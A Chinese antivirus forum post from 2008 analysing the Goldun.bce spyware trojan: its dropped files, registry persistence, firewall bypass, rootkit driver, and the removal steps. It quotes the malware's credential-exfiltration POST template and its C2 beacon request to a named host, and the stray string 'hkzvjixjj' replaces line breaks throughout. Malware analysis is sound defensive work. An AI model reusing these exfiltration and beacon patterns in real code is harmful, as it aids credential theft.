|
| Trojan-Spy.Win32.Goldun.bce分析 |
| 作者 开开 查看 137 发表时间 2008/10/29 17:39 【论坛浏览】 |
|
病毒名称: Trojan-Spy.Win32.Goldun.bcehkzvjixjj 病毒类型: 蠕虫hkzvjixjj 文件 MD5: 1FFCB1EA024C228ADE6D8DAD681C6ED7hkzvjixjj 公开范围: 完全公开hkzvjixjj 危害等级: 4hkzvjixjj 文件长度: 33,398 字节hkzvjixjj 感染系统: Windows98以上版本hkzvjixjj 开发工具: UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlohkzvjixjj hkzvjixjj 病毒描述hkzvjixjj 该病毒为ecard病毒变种,病毒运行后添加注册表启动项,衍生病毒文件gzipmod.dll、vbagz.sys到%System32%目录下,该病毒调用系统进程rundll32.exe,并将gzipmod.dll、vbagz.sys以句柄的形式注入其中,添加注册表躲避系统自带防火墙,创建病毒注册表服务,病毒运行之后删除自身文件,创造了互斥体防止病毒多次运行,病毒驱动通过 nt!ObReferenceObjectByName 打开磁盘驱动 DriverDisk,并遍历该驱动创建的所有设备对象,该驱动记录这些设备对象的地址用来隐藏病毒衍生的文件,检测路由器支持的路由协议功能、保护该病毒衍生的文件不被查找、发现,连接网络隐藏打开地址,收集有关的电子邮件用户端使用受影响的系统。hkzvjixjj hkzvjixjj 行为分析hkzvjixjj 本地行为hkzvjixjj 1、文件运行后会释放以下文件hkzvjixjj %system32%\gzipmod.dllhkzvjixjj %system32%\vbagz.syshkzvjixjj 2、添加注册表项,创建病毒服务hkzvjixjj HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\hkzvjixjj SharedAccess\Parameters\FirewallPolicy\StandardProfile\hkzvjixjj AuthorizedApplications\List\C:\WINDOWS\system32\rundll32.exehkzvjixjj 值: 字符串: "C:\WINDOWS\system32\rundll32.exe:*:Enabled:rundll32"hkzvjixjj 描述:添加注册表躲避系统自带防火墙hkzvjixjj HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\hkzvjixjj Winlogon\Notify\gzipmod\DllNamehkzvjixjj 值: 字符串: "gzipmod.dll."hkzvjixjj 描述:添加注册表启动项hkzvjixjj HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\vbagz\DisplayNamehkzvjixjj 值: 字符串: "VBA PnP Driver"hkzvjixjj HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\vbagz\ImagePathhkzvjixjj 值: 字符串: "system32\vbagz.sys."hkzvjixjj HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\vbagz\Starthkzvjixjj 值: DWORD: 1 (0x1)hkzvjixjj HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\vbagz\Typehkzvjixjj 值: DWORD: 1 (0x1)hkzvjixjj 描述:添加病毒服务hkzvjixjj 3、创建rundll32.exe进程将病毒DLL文件注入到该进程中,创建病毒注册表服务,病毒运行之后删除自身文件。hkzvjixjj 4、病毒驱动文件通过 nt!ObReferenceObjectByName 打开磁盘驱动 DriverDisk,并遍历该驱动创建的所有设备对象,该驱动记录这些设备对象的地址用来在将来进行文件隐藏操作时用,检测路由器支持的路由协议功能、保护该病毒衍生的文件不被查找、发现,创建以下驱动设备:hkzvjixjj dprothkzvjixjj emulx86hkzvjixjj fprothkzvjixjj itcoehkzvjixjj klitehkzvjixjj ltppdhkzvjixjj wlitehkzvjixjj x86emulhkzvjixjj xprothkzvjixjj 5、一旦执行,DLL文件试图删除该文件如下(未实现):hkzvjixjj %Documents and Settings%\所有用户\开始菜单\程序\启动\newrnj.exehkzvjixjj 6、创造了互斥体名为:“trmirmtx”,防止病毒多次运行。hkzvjixjj 7、收集有关的电子邮件信息(未实现):hkzvjixjj 1000B07E=mzipmod.1000B07E (ASCII "POST /%s?dt=0&id=%u HTTP/1.0hkzvjixjj User-Agent: %shkzvjixjj Host: %shkzvjixjj Content-Length: %uhkzvjixjj Content-Type: multipart/form-data; boundary=---------------------------71438020933hkzvjixjj Connection: Keep-Alivehkzvjixjj Pragma: no-cachehkzvjixjj ---------------)hkzvjixjj \n\n-----------------------------71438020933\n\nContent-Disposition: form-data; name="url"\n\n\n\nhkzvjixjj \n\n-----------------------------71438020933\n\nContent-Disposition: form-data; name="stb"\n\n\n\nhkzvjixjj \n\n-----------------------------71438020933\n\nContent-Disposition: form-data; name="frm"\n\n\n\nhkzvjixjj \n\n-----------------------------71438020933\n\nContent-Disposition: form-data; name="cpn"\n\n\n\nhkzvjixjj -----------------------------71438020933\n\nContent-Disposition: form-data; name="mydata"; filename="%u%u%s"\n\nContent-Type: application/octet-stream\n\n\n\nhkzvjixjj POP3 Password2hkzvjixjj POP3 Serverhkzvjixjj POP3 User Namehkzvjixjj IMAP Password2hkzvjixjj IMAP Serverhkzvjixjj IMAP User Namehkzvjixjj 网络行为hkzvjixjj 病毒运行后向195.93.219.***发送GET信息:hkzvjixjj GET os****.net/222/data.php?trackid=706172616D3D636D64266C616E673D2669643D32323232hkzvjixjj 267368656C6C3D3026736F636B73706F72743D36303532267665723D392668747470706F72743D3630hkzvjixjj 353126757074696D656D3D3426757074696D65683D30267569643D3238443730323236323136463837443333 HTTP/1.0hkzvjixjj User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 2600.xpsp.11894-27197)hkzvjixjj Host: osliki.nethkzvjixjj Connection: Keep-Alivehkzvjixjj 该连接已加密,解密后得到:hkzvjixjj Os****.net/222/data.php?trackid=param=cmd&lang=&id=2222&shell=0&socksporthkzvjixjj =6052&ver=9&httpport=6051&uptimem=4&uptimeh=0&uid=28D70226216F87D33hkzvjixjj 经分析此连接已失效hkzvjixjj 注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。hkzvjixjj %Windir% WINDODWS所在目录hkzvjixjj %DriveLetter% 逻辑驱动器根目录hkzvjixjj %ProgramFiles% 系统程序默认安装目录hkzvjixjj %HomeDrive% 当前启动的系统的所在分区hkzvjixjj %Documents and Settings% 当前用户文档根目录hkzvjixjj %Temp% \Documents and Settingshkzvjixjj \当前用户\Local Settings\Temphkzvjixjj %System32% 系统的 System32文件夹hkzvjixjj hkzvjixjj Windows2000/NT中默认的安装路径是C:\Winnt\System32hkzvjixjj windows95/98/me中默认的安装路径是%WINDOWS%\Systemhkzvjixjj windowsXP中默认的安装路径是%system32%hkzvjixjj hkzvjixjj 清除方案hkzvjixjj 1、使用安天防线可彻底清除此病毒(推荐),点击此处免费下载安天防线。hkzvjixjj 2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。推荐使用ATool管理工具,点击此处下载免费工具Atool。hkzvjixjj (1)先打开Atool工具结束.rundll32.exe进程。 hkzvjixjj (2)使用Atool工具删除病毒衍生的文件hkzvjixjj hkzvjixjj %system32%\gzipmod.dllhkzvjixjj %system32%\vbagz.syshkzvjixjj (3)删除病毒添加的注册表项hkzvjixjj HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\hkzvjixjj FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\system32\rundll32.exehkzvjixjj 删除List键下的键值C:\WINDOWS\system32\rundll32.exehkzvjixjj HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\gzipmod\DllNamehkzvjixjj 删除Notify键下的gzipmod主键值hkzvjixjj HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Serviceshkzvjixjj 删除Services键下vbagz主键值 |
| 序号 | 评论者 | 共有评论 0 【论坛浏览】 【发表评论】 | 评论时间 |
| 当前无任何评论,或评论已被禁止显示 | |||
共有评论数 0 每页显示 10
|
|||
 |
紧急求救!!!!! |
| |
[图文] 反病毒木马辅助工具... |
 |
[求助] 无法进入系统 |
| |
[讨论] 为什么系统的时间老... |
| |
[求助]系统核心服务程序6和... |
| |
[求助] 开机后瑞星杀毒软件... |
| |
[已解决] [求助]跪求如何清... |
| |
每次开机都弹出三个网页对... |
| |
[求助] 帮看下扫描 |
| |
反病毒可能需要用到的方法... |
